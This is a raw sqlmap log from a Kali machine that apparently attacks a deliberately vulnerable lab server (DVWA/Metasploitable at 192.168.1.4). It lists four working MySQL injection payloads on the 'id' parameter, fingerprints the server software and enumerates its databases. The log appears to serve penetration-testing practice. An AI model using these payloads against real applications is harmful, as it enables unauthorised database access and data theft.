        ___
       __H__
 ___ ___["]_____ ___ ___  {1.10.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:41:38 /2026-03-29/

[15:41:38] [INFO] parsing HTTP request from 'sqli.txt'
[15:41:40] [INFO] resuming back-end DBMS 'mysql' 
[15:41:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 2944=2944#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(2716,4028)>(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(2716=2716,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM (SELECT 6881 UNION SELECT 1704 UNION SELECT 1817 UNION SELECT 1069)a GROUP BY x)-- Bgem&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5310 FROM (SELECT(SLEEP(5)))kaoO)-- EWLN&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7162627671,0x54495770466548475a7344497a5547546e4872684375524444584e50784f636f5861714b5362474e,0x71627a7171),NULL#&Submit=Submit
---
[15:41:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[15:41:47] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[15:41:47] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.4'

[*] ending @ 15:41:47 /2026-03-29/

